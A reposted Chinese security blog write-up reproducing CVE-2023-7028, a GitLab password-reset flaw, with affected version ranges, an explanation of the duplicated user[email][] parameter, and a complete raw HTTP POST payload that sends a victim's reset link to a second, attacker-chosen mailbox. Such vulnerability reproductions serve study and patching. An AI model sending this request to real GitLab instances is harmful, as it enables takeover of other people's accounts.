CVE-2023-7028__Gitlab任意用户密码重置 复现

admin 2024年1月15日19:05:54评论33 views字数 1354阅读4分30秒阅读模式



CVE-2023-7028__Gitlab任意用户密码重置  复现

CVE-2023-7028

漏洞描述:

攻击者通过构造恶意请求,接收密码重置链接。重置目标账户密码接管账户。

影响版本:

16.1 <=GitLab CE<16.1.616.2 <=GitLab CE<16.2.816.3 <=GitLab CE<16.3.616.4 <=GitLab CE<16.4.416.5 <=GitLab CE<16.5.616.6 <=GitLab CE<16.6.416.7 <=GitLab CE<16.7.216.1 <=GitLab EE<16.1.616.2 <=GitLab EE<16.2.816.3 <=GitLab EE<16.3.616.4 <=GitLab EE<16.4.416.5 <=GitLab EE<16.5.616.6 <=GitLab EE<16.6.416.7 <=GitLab EE<16.7.2

 

漏洞复现:

1.重置密码URL    

/users/password/new

CVE-2023-7028__Gitlab任意用户密码重置  复现

2.构造Payload

添加[]时一封邮件可以同时发送给两个邮箱。user[email][]=需要重置的邮箱&user[email][]=接收重置链接的邮箱,这样被重置的邮箱和攻击者邮箱都会收到重置密码的邮件。

Tips:重置的邮箱必须是存在的邮箱地址,否则不会发送邮件。

POST /users/password HTTP/2Host: 1.1.1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brReferer: https://xxxxx/users/password/newContent-Type: application/x-www-form-urlencodedContent-Length: 191Origin: xxhttps://xxxxxUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1        Te: trailers authenticity_token=32xxxxxxxxxgw&user%5Bemail%5D%5B%5D=xxxx%40example.com&user%5Bemail%5D%5B%5D=xxxx%40xxx.xx

CVE-2023-7028__Gitlab任意用户密码重置  复现

可以看到是两个接收人  

CVE-2023-7028__Gitlab任意用户密码重置  复现    

个人总结:

漏洞用处不是特别大,影响范围广、没有明确的有效邮箱地址时也可以重置密码,但是这种情况下用处不是很大。有明确邮箱地址时会危害产品业务安全,容易造成供应链攻击。

原文始发于微信公众号(YongYe 安全实验室):CVE-2023-7028__Gitlab任意用户密码重置 复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月15日19:05:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-7028__Gitlab任意用户密码重置 复现https://cn-sec.com/archives/2396000.html

发表评论

匿名网友 填写信息